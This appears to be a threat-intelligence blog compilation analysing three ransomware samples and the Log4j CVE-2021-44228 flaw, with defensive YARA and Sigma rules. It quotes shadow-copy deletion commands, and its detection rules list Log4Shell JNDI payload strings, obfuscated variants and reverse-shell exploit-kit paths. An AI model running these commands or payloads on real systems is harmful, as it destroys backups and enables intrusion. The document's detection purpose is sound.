・Use best-in-class IDS/IPS, firewall and other antivirus/anti-spam/anti-ransomware and anti-malware solutions.

・Regular audits are necessary from third party.

・Regular vulnerability assessment and patching policy.

 

Malware Analysis – Supersuso

Supersuso is a ransomware intended to encrypt sensitive data in order to restrict access to it. During the encryption process, this malware sample adds the extension .ICQ_SUPERSUSO to mark inaccessible files. When the encryption process ends, Supersuso malware creates a ransom note #Decrypt#.txt

Malicious Sample Analysis:

MD5:CCFACEE2EBA9FCDB7FDDD4E9D7B846FF

SHA256: 8C142BFDA0D07A7E62C1D761CB9DF9B3F99F19479431DFC3F778408FE113F4C8

File Type: Windows PE-32 Executable

Subsystem: GUI

Compilation Time: Wed Sep 01 20:02:12 2021

Malware analysis SupersusoFig 1

   Fig 2

As shown in the above figure, this malware sample is a 32-bit Windows executable file, having a GUI subsystem and compile-time on 01 Sep 2021. Figure2  shows that this malware sample was not packed.

            Fig 3

These are malicious sample files detected through various anti-virus engines and most of them are detected as a Ransomware.

Fig 4

Fig 5

                 Fig 6

Fig 7

As shown in the above figures the APIs imported by the ICQ_SUPERSUSO Ransomware and indicate the following functionality/capability in the malware:

  1. Synchronization capability to handle multiple processes and threads and to access shared resources.
  2. Ability to handle windows/GUI functions.
  3. Ability to search Drives, Folders and exclude some specific files/folders from encrypting.
  4. Ability to create new threads and processes.
  5. Ability to access and manipulate access rights of the running processes.
  6. Enumeration of network resources and existing network connections.
  7. Capability to check the access rights of user.
  8. Ability to access folder paths.
  9. Dynamic memory allocation and manipulation capability.
  10. Capability to load other DLLs, libraries, and processes in memory.
  11. Capability to sleep or deactivate when want to hide itself.
  12. Ability to handle, search, open, close, write, access, perform operation and manipulating files.
  13. Ability to handle, search, access and manipulating processes in memory.
  14. Ability to encrypt files.
  15. Capability to handle command line arguments/strings of the process.
  16. Capability to create snapshots of other processes include their heaps, modules, and threads.
  17. Capability to delete all volume shadow copies on a system
  18. Capability to disable firewall
  19. Capability to terminate running process

 

Fig 8

As shown in the above fig, Countries excluded from this ICQ_SUPERSUSO ransomware attack are mentioned:

Fig 9

Disable firewall setting:

Fig 10

Delete all volume shadow copies on a system:

      Fig 11

Rarog Cryptocurrency Mining Trojan. This Ransomware terminates the  Rarog Process if found on the affected system.

Fig 12

The file is encrypted by CryptEncrpt function:

Fig 13

The Malware sample creates threat-starting and threat-calling addresses. See below code snippet and the encrypt executable file.

Fig 14

Once this malware sample is an encrypted file, this malware sample adds the extension .ICQ_SUPERSUSO  and creates a ransom note # Decrypt#.txt 

MITRE Attack Tactics and Techniques:                                                                                    

No. Tactic Technique
1 Initial Access (TA0001) T1566 Phishing
2 Execution (TA0002)

T1059  Command and Scripting Interpreter

5 Discovery (TA0007) T1083   File and Directory Discovery

T1057 Process Discovery

6 Impact (TA0040) T1486 Data Encrypted

T1490 Inhibit System Recovery

  

List of IOCs:

No. Indicator Type Remarks
1 CCFACEE2EBA9FCDB7FDDD4E9D7B846FF Hash MD5

 

Recommendations:

  1. Ensure you have a view on your external threat landscape and your security team is receiving threat intel that is relevant
  2. Implement a complex password policy with renewal at regular intervals.
  3. Implement a Multifactor Authentication policy.
  4. Regularly update all software on all systems and networks and other devices and turn on automatic updates if possible.
  5. Implement a Role-Based access policy and restrict it to minimal as per the requirement.
  6. Implement an Internal threat management policy that trains employees on the latest threats and ransomware attacks and what to do in such scenarios.
  7. Restrict to click or open suspicious/unauthorized links and files, specifically on organization devices.
  8. Must implement regular back-ups policy, more than one backup, and keep one on a separate network and other isolated offline at a different place.
  9. Use reputatable IDS/IPS, firewall, and antivirus/anti-spam/anti-ransomware and anti-malware solutions.
  10. Regular audits are necessary from a third party.
  11. Regular vulnerability assessment and patching policy.

 

TECHNICAL ANALYSIS – BIGLOCK RANSOMWARE

BigLock is a ransomware discovered in 2020 and also known as “corona-lock.” It encrypts files on the victim system with chacha and AES encryption as specified by the ransomware authors in the ransom note. All encrypted files are appended with “.corona-lock” extension. The malware took advantage of the corona pandemic period by tricking people to open malicious documents with a name like “CORONA TREATMENT.doc” file distributed as an email attachment which is carrying malicious ransomware payload. The malware is spread through spam emails having subject line as “Corona Virus Cure for China or Italy”. Upon execution, the malware modifies registry entries and injects malicious code among boot-up files. After encryption, the ransom-note “README_LOCK.txt” dropped on the desktop and other folders.

The ransom notes state that the data has been encrypted and the algorithm used for encryption are cha and AES. Further, the victims are warned not to use any third-party software or decryption tools. To recover encrypted data the ransom note mentions an email-id to contact malware authors.

 

Risk Score: 8

Confidence Level: High.

Suspected Malware: BigLock Malware.

Function: Ransomware.

Threat actor Associations:

Other Malware related to BigLock: CovidWorldCry Ransomware, CoronaLock Ransomware.

First Seen: May 2020.

 

BigLock Ransomware Analysis:

File Details: As shown in Figure1 and Figure3, the following are the details related to the ransomware “BigLLock”.

File Type: Windows PE-32 Executable

MD5: d82b27fdcc3a63f2ab0c46c5a3caef0a

SHA256: 746c79b5b6030091c37251939690eee31d023de5303544b46032bf89580806e5

Subsystem: GUI

Compilation Time: March 2019

 

Figure1

As shown in Figure1 above the malware is Visual C/C++ based and is PE-32 executable. Further, Figure2 below specifies that the malware is packed.

Figure2

Figure3 below shows the hashes corresponding to the ransomware and shows that the file has a GUI subsystem and compilation timestamp of 28 March 2019 that is the time when the corona (covid-19) pandemic starts.

Figure3

Figure4 below shows that how the ransomware is detected as malicious by different anti-malware solutions and some specifically mentioned it related to ransom activity (see highlighted part in Figure4 below).

Figure4

Figure5 below shows the sections present in the malware and looking quite normal except the .data section which has a large difference in its raw and virtual size and may contain some malicious packed code.

Figure5

Figure6 below shows the libraries imported by the malware and indicated some of the functionality which it carries which includes low-level functionality to handle memory and devices, the functionality of handling graphical user interface, and other user-interface components.

Figure6

Figure7 below shows the APIs imported by the ransomware and indicate the following functionality/capability in the malware:

  • Multiple Anti-debugging capabilities.
  • Capability to collect system information.
  • Synchronization capability to handle multiple processes and threads and to access shared resources.
  • Capability to handle windows/GUI functions.
  • Capability to search Drives, Folders.
  • Capability to access registry entries and manipulate them.
  • Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  • Capability to create new threads and processes.
  • Dynamic memory allocation and manipulation capability.
  • Capability to load other DLLs, libraries, and processes in memory.
  • Capability to sleep or deactivate when want to hide.
  • Ability to handle, search, open, write, access, perform the operation, and manipulate files.
  • Ability to encrypt files.
  • Capability to handle command-line arguments/strings of the process.

Figure7

Upon execution of the ransomware, it encrypts the file with the extension “.corona_lock”, for example, if the filename is “sample.zip” after encryption the file name changed to “sample.zip.corona-lock” as shown in Figure8 (highlighted in red) given below. It also excludes the file having some specific extension like .exe. .dll (see Figure8 highlighted part in green).

Figure8

Figure 9 shows all the folders accessed by the ransomware.

Figure9

Figure10 below shows the ransom note dropped by the ransomware on the victim machine. It specifies that the encryption used is the combination of ChaCha and AES encryption algorithms and the files encrypted were marked by extension “.corona-lock”. Further instructions are given to the victim not to use any decryption tools which results in loss of data permanently and not contact any third party like data recovery companies. One email-Id “[email protected]” is also mentioned to contact malware authors for getting decryption key. Each victim user has been assigned a unique id as specified in the ransom note below in Figure10. The malware authors instructed that during correspondence the victim must specify this unique id. The ransom notes also specify a long list of files encrypted by the ransomware.

Figure10

Figure11 below shows the process tree corresponding to ransomware execution. As shown at point1, the malware unpacks the packed code and uses process hollowing to replace the process with a new malicious process with the same name. After that the malware deletes the shadow volume copies by three different methods, In the first method as shown in Figure11 (at point 2 ), the malware tries to remove the shadow copies by resizing them by using the vssadmin.exe utility available in windows. This method of resizing diff areas to remove shadow copies is relatively new in ransomware families. Similarly in 2nd method at point 3 it used the same utility “vssadmin.exe” to delete the shadow copies by executing the command: “vssadmin.exe Delete Shadows /All /Quiet” and in the 3rd method (as shown at point 4), the ransomware used the “wmic.exe” utility of windows to delete the shadow copies as “wmic.exe SHADOWCOPY /nointeractive”. The methods 2nd and 3rd are quite popular among ransomware families to delete the shadow volume copies so that the victim can’t be able to recover the encrypted files. At last, as shown in Figure11 (point5), the malware tries to delete the ransomware executable from the system.

 

Figure11

Figure12 below shows some snippets of registry access by the ransomware. Here the highlighted part shows that the malware tries to gain persistence by modifying registry entries.

Figure12

 

MITRE Attack Tactics and Techniques:

 

Sr No. Tactic Technique
1 Initial Access (TA0001) T1566 Phishing
2 Execution (TA0002) T1204.002 Malicious File
3 Persistence (TA0003) T1547.001 Registry Keys
4 Defense Evasion (TA0005) T1112 Modify Registry
T1497.003 Time-Based Evasion
T1055.012 Process Hollowing
5 Discovery (TA0007) T1082 System Information Discovery
6 Impact (TA0040) T1486 Data Encrypted

 

List of IOCs:

Sr No. Indicator Type Remarks
1 d82b27fdcc3a63f2ab0c46c5a3caef0a Hash MD5
2 746c79b5b6030091c37251939690eee31d023de5303544b46032bf89580806e5 Hash SHA256
3 4e6569aeb368883e10afe84c04a19567c3dae9fc2897b08028ab71dc353a41646f8d61efe

da5786d78a7aa38d4db4167da4f1d123464a3fced948cccce1871ff

Hash SHA512

 

Recommendations:

  1. Implement a complex password policy with renewal at regular intervals.
  2. Implement a Multifactor Authentication policy.
  3. Regularly update all software on all systems and networks and other devices and turn on automatic updates if possible.
  4. Implement a Role-Based access policy and restrict it to minimal as per the requirement.
  5. Implement an Internal threat management policy that includes, train and educate employees about the latest threats and ransomware attacks and how to behave in such scenarios.
  6. Restrict to click or open suspicious/unauthorized links and files, specifically on organization devices.
  7. Must implement regular back-ups policy, more than one backup, and kept one on a separate network and other isolated offline at a different place.
  8. Use best IDS/IPS, firewall, and another antivirus/anti-spam/anti-ransomware and anti-malware solutions.
  9. Regular audits are necessary from a third party.
  10. Regular vulnerability assessment and patching policy.

 

 

Apache Log4j – Technical Analysis of Critical Remote Code Execution Vulnerability Tracked as CVE-2021-44228

EXECUTIVE SUMMARY

 

A critical Remote Code Execution Vulnerability tracked as CVE-2021-44228 in Apache Log4j has been found to be exploited in the wild.

Upon analysis of the associated Indicators of Compromise (IOCs), we observed indicators predominantly linked to Russian Threat Actor dubbed Fancy Bear. In addition, some of the indicators were also found associated with several families such as Kinsing, Coinminer, Mirai, Tsunami, Mushtik.

Additionally, and based on campaigns that CYFIRMA is tracking, North Korean threat actor Lazarus Group have been observed in the past, to be associated with some of the indicators.

The primary motive behind abusing the vulnerability appears to be:

  • Gain access of the vulnerable server
  • Install malware
  • Exfiltrate data

CYFIRMA recommends using reported IOC details for measures against this campaign and threat hunting within your environment.

CYFIRMA Risk Rating for this Research is High.

NOTE: The vulnerability has been reported as situational awareness intelligence. CYFIRMA would like to highlight the potential risk and indicators observed which may be leveraged by nation-state threat actors in exploiting the vulnerability to gain a foothold and exfiltrate sensitive information from the target organizations.

 

VULNERABILITY AT A GLANCE

Remote Code Execution Vulnerability in Apache Log4j

CVE-2021-44228

CVSS Score: 10.0

Exploit Details: This vulnerability is being exploited in the wild and could be leveraged by threat actors to gain access into the network of the organizations. Exploit Details: Link1, Link2, Link3

Description:

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From Log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

Geography-wise illustration (log4j):

Source: Surface Web

 

Top 10 values for ports (log4j)

Source: Surface Web

 

Impact

Successful exploitation of the vulnerability could allow an attacker to compromise the affected system and gain access to the system and take full control.

Insights

The vulnerability is caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features.

The CWE is CWE-20 (Improper Input Validation), CWE-400 (Uncontrolled Resource Consumption), CWE-502 (Deserialization of Untrusted Data) and the vulnerability has an impact on confidentiality, integrity, and availability.

Affected Version

Please refer to the following link for the affected versions:

Link

Mitigation

Please refer to the following link for the mitigation:

Link

Security Indicators

  1. Is there already an exploit tool to attack this vulnerability? Yes
  2. Has this vulnerability already been used in an attack? Unknown
  3. Are hackers discussing about this vulnerability in the Deep/Dark Web? Yes
  4. What is the attack complexity level? Low

INDICATORS OF COMPROMISE ANALYSIS

Please write to [email protected] for access to IOCs file for attribution to threat actors, campaigns, and malware used. Use the IOCs to exercise controls on your security systems.

 

VULNERABILITY INTELLIGENCE HYPOTHESIS

Based on the target infrastructure observed for this vulnerability, the CYFIRMA Research team identified threat actors who could leverage them to exploit the vulnerability:

  • Russian threat actors: Fancy Bear, and many more.
  • North Korean threat actors: Lazarus Group

By exploiting the vulnerable servers, the suspected threat actors could gain access to the vulnerable server, install malware, and exfiltrate data.

This hypothesis is based on the assessment that the threat actors seem to be using Kinsing, Coinminer, Mirai, Tsunami, Mushtik malware; as observed during the analysis of IOCs.

Based on the MITRE Attack framework, the following are the tactics and techniques observed which could be leveraged by the attackers:

Sr. No Tactics Techniques
1 TA0002: Execution T1059.004: Command and Scripting Interpreter: Unix Shell
2 TA0005: Defense Evasion T1222.002: File and Directory Permissions Modification

 

Following illustrates the infection chain of the log4j JNDI attack:

Source: Surface Web

In addition, the following provides more details on the attacks:

Current Exploitation Endeavors

Ongoing Attack Endeavors

 

Current Protection Against Attack Endeavors

 

Potential Impact

 

ATTRIBUTION WITH CYFIRMA TRACKED CAMPAIGN

CYFIRMA researchers observed some of the indicators were associated with multiple campaigns as given below:

S. No Campaign Name

Associated Threat Actor

1 Beamer-21 Lazarus Group
2 Eliminate#30 Fancy Bear
3 Sandpaper Lazarus Group
4 Oliver Path Fancy Bear
5 20 Yard Fancy Bear
6 UNC020 Fancy Bear

 

INSIGHTS

Whenever such a new threat emerges, organizations and cyber defenders often need to translate vague descriptions and untested research artifacts into actionable intelligence for their particular risk models, which might in turn introduce more anomalies in the landscape.

Organizations are increasingly susceptible to vulnerabilities hosted by complex supply chains that offer potential attackers’ footholds into the organization’s infrastructure /network /applications /database.

Critical learning for organizations from such an incident is the importance of adequate Access Rights Management where access to information systems is identified, tracked, controlled, and managed. Such controls must apply to all information systems throughout the enterprise (hosted, cloud-based, or third-party systems) and extend to all individuals according to their role.

-> If you are using Log4j v2.10 or above, and cannot upgrade, then set the property:

  • formatMsgNoLookups=true

In addition, an environment variable can be set for these same affected versions:

  • LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Or remove the JndiLookup class from the classpath. For example, you can run a command like:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class  to remove the class from the log4j-core

 

-> Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defences based on the intelligence provided.

-> Integrate CTI feeds with existing SIEM solutions to allow faster detection and alerting of malicious activities. Enrich threat intelligence by combining local monitoring, internal and external feeds.

-> Apply the Yara rule mentioned in your network to search for evidence of spear phishing being sent to your organization.

-> Configure the provided Sigma rules in your network defence mechanisms to alert attempts of credential theft and to monitor and restrict traffic across the network.

-> Deploy an advanced Endpoint Detection and Response (EDR) engine as part of the organization’s layered security strategy.

-> Patch/upgrade all applications/software regularly with the latest versions when available on priority.

-> Configure network defense systems such as intrusion detection systems (IDS), intrusion prevention systems (IPS) for real-time alerts.

  • Deploy an advanced Endpoint Detection and Response (EDR) engine as part of the organization’s layered security strategy.
  • The use of CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is effective against automated bots.
  • Restrict the logins to a specific range of IP Addresses.
  • Implement Multi-Factor Authentication (MFA) to reduce the risk of potential data breaches.
  • Consider moving to a non-standard port for services instead of using the default port.

YARA Rules

The mentioned YARA rules assist in monitoring and identifying new alerts.

Rule 1:

ule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {

meta:

description = “Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228”

score = 60

strings:

$x1 = “${jndi:ldap:/”

$x2 = “${jndi:rmi:/”

$x3 = “${jndi:ldaps:/”

$x4 = “${jndi:dns:/”

condition:

1 of them

}

 

Rule 2:

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {

meta:

description = “Detects indicators in server logs that indicate the exploitation of CVE-2021-44228”

score = 80

strings:

$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,42}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/

$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/

condition:

$x1 and not 1 of ($fp*)

}

 

Rule 3:

rule crime_h2miner_kinsing

{

meta:

description = “Rule to find Kinsing malware”

strings:

$s1 = “-iL $INPUT –rate $RATE -p$PORT -oL $OUTPUT”

$s2 = “libpcap”

$s3 = “main.backconnect”

$s4 = “main.masscan”

$s5 = “main.checkHealth”

$s6 = “main.redisBrute”

$s7 = “ActiveC2CUrl”

$s8 = “main.RC4”

$s9 = “main.runTask”

condition:

(uint32(0) == 0x464C457F) and filesize > 1MB and all of them

}

 

Rule 4:

rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {

meta:

description = “Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228”

strings:

$xr1  = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/

condition:

1 of them

}

Rule 5:

rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {

meta:

description = “Detects JNDI Exploit Kit patterns in files”

strings:

$ = “/Basic/Command/Base64/”

$ = “/Basic/ReverseShell/”

$ = “/Basic/TomcatMemshell”

$ = “/Basic/JettyMemshell”

$ = “/Basic/WeblogicMemshell”

$ = “/Basic/JBossMemshell”

$ = “/Basic/WebsphereMemshell”

$ = “/Basic/SpringMemshell”

$ = “/Deserialization/URLDNS/”

$ = “/Deserialization/CommonsCollections1/Dnslog/”

 

$ = “/Deserialization/CommonsCollections2/Command/Base64/”

$ = “/Deserialization/CommonsBeanutils1/ReverseShell/”

$ = “/Deserialization/Jre8u20/TomcatMemshell”

$ = “/TomcatBypass/Dnslog/”

$ = “/TomcatBypass/Command/”

$ = “/TomcatBypass/ReverseShell/”

$ = “/TomcatBypass/TomcatMemshell”

$ = “/TomcatBypass/SpringMemshell”

$ = “/GroovyBypass/Command/”

$ = “/WebsphereBypass/Upload/”

condition:

1 of them

}

 

Rule 6:

rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {

meta:

description = “Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228”

strings:

$xa1 = “header with value of BadAttributeValueException: ”

$sa1 = “.log4j.core.net.JndiManager.lookup(JndiManager”

$sa2 = “Error looking up JNDI resource”

condition:

$xa1 or all of ($sa*)

}

 

Rule 7:

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {

meta:

description = “Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228”

strings:

$ = “${jndi:ldap:/”

$ = “${jndi:rmi:/”

$ = “${jndi:ldaps:/”

$ = “${jndi:dns:/”

$ = “${jndi:iiop:/”

$ = “${jndi:http:/”

$ = “${jndi:nis:/”

$ = “${jndi:nds:/”

$ = “${jndi:corba:/”

condition:

1 of them

}

 

Rule 8:

rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {

meta:

description = “Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228”

strings:

$x1 = “$%7Bjndi:”

$x2 = “%2524%257Bjndi”

$x3 = “%2F%252524%25257Bjndi%3A”

$x4 = “${jndi:${lower:”

$x5 = “${::-j}${”

$x6 = “${${env:BARFOO:-j}”

$x7 = “${::-l}${::-d}${::-a}${::-p}”

$x8 = “${base64:JHtqbmRp”

condition:

1 of them

}

 

Rule 9:

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {

meta:

description = “Detects indicators in server logs that indicate the exploitation of CVE-2021-44228”

strings:

$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/

$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/

condition:

$x1 and not 1 of ($fp*)

}

 

Rule 10:

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {

meta:

description = “Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228”

strings:

/* curl -s  */

$sa1 = “Y3VybCAtcy”

$sa2 = “N1cmwgLXMg”

$sa3 = “jdXJsIC1zI”

/* |wget -q -O-  */

$sb1 = “fHdnZXQgLXEgLU8tI”

$sb2 = “x3Z2V0IC1xIC1PLS”

$sb3 = “8d2dldCAtcSAtTy0g”

condition:

1 of ($sa*) and 1 of ($sb*)

}

 

Rule 11:

rule SUSP_JDNIExploit_Indicators_Dec21 {

meta:

description = “Detects indicators of JDNI usage in log files and other payloads”

strings:

$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//

condition:

filesize < 100MB and $xr1

}

 

Rule 12:

rule SUSP_EXPL_OBFUSC_Dec21_1{

meta:

description = “Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228”

strings:

/* ${lower:X} – single character match */

$ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }

/* ${upper:X} – single character match */

$ = { 24 7B 75 70 70 65 72 3A ?? 7D }

/* URL encoded lower – obfuscation in URL */

$ = “$%7blower:”

$ = “$%7bupper:”

$ = “%24%7bjndi:”

$ = “$%7Blower:”

$ = “$%7Bupper:”

$ = “%24%7Bjndi:”

condition:

1 of them

}

 

Source: Surface Web

 

Sigma Rules

It is an open-source  YAML-based signature format which assists SOC to explain log events in a flexible and standardized format, helps to create queries in a common language which could possibly be incorporated in SIEM and EDR solutions.

Rule 1:

title: Always Install Elevated Windows Installer

id: cd951fdc-4b2f-47f5-ba99-a33bf61e3770

description: This rule looks for Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

status: experimental

tags:

– attack.privilege_escalation

– attack.t1548.002

logsource:

product: windows

category: process_creation

detection:

integrity_level:

IntegrityLevel: ‘System’

user:

User|startswith:

– ‘NT AUTHORITY\SYSTEM’

– ‘AUTORITE NT\Sys’ # French language settings

 

 

image_1:

Image|contains|all:

– ‘\Windows\Installer\’

– ‘msi’

Image|endswith:

– ‘tmp’

image_2:

Image|endswith:

– ‘\msiexec.exe’

condition: (image_1 and user) or (image_2 and user and integrity_level)

fields:

– IntegrityLevel

– User

– Image

falsepositives:

– System administrator Usage

– Penetration test

level: medium

 

Rule 2:

title: Non Interactive PowerShell

id: f4bbd493-b796-416e-bbf2-121235348529

description: Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.

status: experimental

tags:

– attack.execution

– attack.t1086          # an old one

– attack.t1059.001

logsource:

category: process_creation

product: windows

detection:

selection:

Image|endswith: ‘\powershell.exe’

filter:

ParentImage|endswith:

– ‘\explorer.exe’

– ‘\CompatTelRunner.exe’

condition: selection and not filter

falsepositives:

– Legitimate programs executing PowerShell scripts

level: low

 

Rule 3:

title: Net.exe Execution

id: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac

status: experimental

tags:

– attack.discovery

– attack.t1049

– attack.t1018

– attack.t1135

– attack.t1201

– attack.t1069.001

– attack.t1069.002

– attack.t1087.001

– attack.t1087.002

– attack.lateral_movement

– attack.t1021.002

– attack.t1077      # an old one

– attack.s0039

logsource:

category: process_creation

product: windows

detection:

selection:

Image|endswith:

– ‘\net.exe’

– ‘\net1.exe’

cmdline:

CommandLine|contains:

– ‘ group’

– ‘ localgroup’

– ‘ user’

– ‘ view’

– ‘ share’

– ‘ accounts’

– ‘ stop ‘

condition: selection and cmdline

fields:

– ComputerName

– User

– CommandLine

– ParentCommandLine

falsepositives:

– Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine.

level: low

 

Rule 4:

title: Stop Windows Service

id: eb87818d-db5d-49cc-a987-d5da331fbd90

description: Detects a windows service to be stopped

status: experimental

tags:

– attack.impact

– attack.t1489

logsource:

category: process_creation

product: windows

detection:

selection:

Image|endswith:

– ‘\sc.exe’

– ‘\net.exe’

– ‘\net1.exe’

CommandLine|contains: ‘stop’

condition: selection

fields:

– ComputerName

– User

– CommandLine

falsepositives:

– Administrator shutting down the service due to upgrade or removal purposes

level: low

Source: Surface Web

TECHNICAL ANALYSIS – Makop Ransomware

Makop Ransomware Analysis

Brief Introduction: Makop ransomware is the latest malware and is trending currently. It instructs the users/victims to contact the malware authors via Tox, a P2P instant messaging protocol. The malware encrypts all the files in each folder and added extension .makop to each file. The format of the encrypted file is “Original_name_of_the_file.Original_extension_of_file.[Unique/random Id associated with the File].[.].makop”. It also drops a ransom note with the name “readme-warning.txt” into each compromised folder and desktop also. It skipped some of the folders like Windows and Winnt in their names or path and also skipped some of the files having specific extensions like .exe, .dll or extensions like lockbit, origami etc related to other ransomware infections. The ransomware uses AES256 Key to decrypt strings at runtime in memory and it also creates mutex to avoid running more than one instance of the malware. The ransomware access and modify registry values and also use it to gain persistence.

Risk Score: 8.

Confidence Level: High.

Suspected Malware: Makop Ransomware.

Function: Encryption and Demand Ransom

Threat actor Associations: Unknown

Other Malwares related to Makop: Phobos

First Seen: 2020

Latest Seen: Dec 2021

Target Industry: Multiple

Target Countries: Multiple

File Details: As shown in Figure1, the following are the details related to the ransomware “Makop”.File Type: Windows PE-32 Executable

MD5: 01f8dfe2d719194088a5fafcbe2832ff

SHA256: bff786ac2f9f89305650d5776dbf1ada6ab229ab87be2c335aedaaf7c438185e

Subsystem: GUI

Compilation Time: July 2021

Figure 1

Figure1 above shows that our malware sample is Windows PE-32 executable having GUI subsystem and compile time is 18 July 2021. It also shows various hashes corresponding to the sample file which may also act as IOCs.

Figure2 below shows that the malware sample file is Visual C/C++ based and Figure3 shows that the file is not packed.

Figure2

Figure3

Figure 4

Our research team has analyzed the malicious sample file through various anti-virus engines and most of them were detected as malicious and some specifically (see Figure4 above, highlighted part) detect it as Makop Ransomware.

Figure5 below shows sections present in the malware file and it also has a virtualized section .data means can only be available in memory and indicate towards the presence of some code/data that can only be unpacked in memory by the malware.

Figure5

Figure6

Figure6 above shows various libraries imported by the ransomware. The libraries indicate the malware functionality. It can have low-level functionality which includes memory/hardware access and manipulation. It has the capability to access and manipulate registry entries. It can access user-interface components and ability to control user actions. Mpr.dll contains functions used to handle communication between OS and network providers. It has the ability to open web pages and files.

 

Figure7

Figure7 above shows APIs imported by the malware and indicate towards following capability and functionality available in the malware:

  1. Capability to collect system information.
  2. Synchronization capability to handle multiple processes and threads and to access shared resources.
  3. Capability to handle windows/GUI functions.
  4. Capability to search Drives, Folders and exclude some specific files/folders from encrypting.
  5. Capability to access registry entries and manipulate them.
  6. Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  7. Capability to create new threads and processes.
  8. Capability to access and manipulate access rights of the running processes.
  9. Enumeration of network resources and existing network connections.
  10. Ability to check the access rights of users.
  11. Capability to access folder paths.
  12. Dynamic memory allocation and manipulation capability.
  13. Capability to load other DLLs, libraries, and processes in memory.
  14. Capability to sleep or deactivate when want to hide itself.
  15. Ability to handle, search, open, close, write, access, perform operation and manipulating files.
  16. Ability to handle, search, access and manipulating processes in memory.
  17. Ability to encrypt files.
  18. Capability to handle command line arguments/strings of the process.
  19. Capability to create snapshots of other processes include their heaps, modules, and threads.
  20. Capability to remain hidden until particular key combination is pressed or monitor pressing of some particular key combination.

When our research team runs the ransomware, a GUI interface pops up on the screen as shown below in Figure8. The ransomware runs in administrative mode and it is strange that when we click on start then only it starts executing and encrypting the file. The possible reason behind this is that the ransomware has the capability to hide/control GUI components, so when in actual ransomware may execute this interface will be hidden from the user and is used to control the working of the ransomware.

Figure8

After encrypting file, the “Makop Ransomware” drops the ransom note with the name “readme-warning.txt” shown in Figure9 to each folder and Desktop. The ransom note mentioned a few FAQs and answers like what has happened with the victim machine, how a victim can retrieve their files, how a victim may contact the malware authors for decryption keys, and so on. The ransom note instructs the victim to contact the attacker through Tox (a P2P instant-messing protocol) as shown in Figure9 (highlighted part).

 

Figure9

Further as shown in Figure10 given below, the “Makop ransomware” encrypt the files in each folder on the victim machine and add extension .makop at the end. The encrypted file name changed to the format mentioned below:

Original_name_of_the_file.Original_extension_of_file.[Unique/random Id associated with the File].[.].makop

Example: Sample1.docx.[3B74C342].makop (as shown in Figure9).

Figure10

Figure11

The makop ransomware does not encrypt contents of folders/directories that contain “Windows” or “Winnt” in their path/names like “C:\Windows”, “C:\ProgramData\microsoft\windows\” etc. Further “Makop Ransomware also does not encrypt files having specific extensions like .exe, .dll, .makop, boot.ini as shown in Figure11 above. Some of the extensions like lockbit, origami, raga, shootlock etc are also skipped which are the result of other ransomware infections.

Some of the code snippets (Figure 12) are given below to provide more insights into the functionality possessed by the “Makop Ransomware”

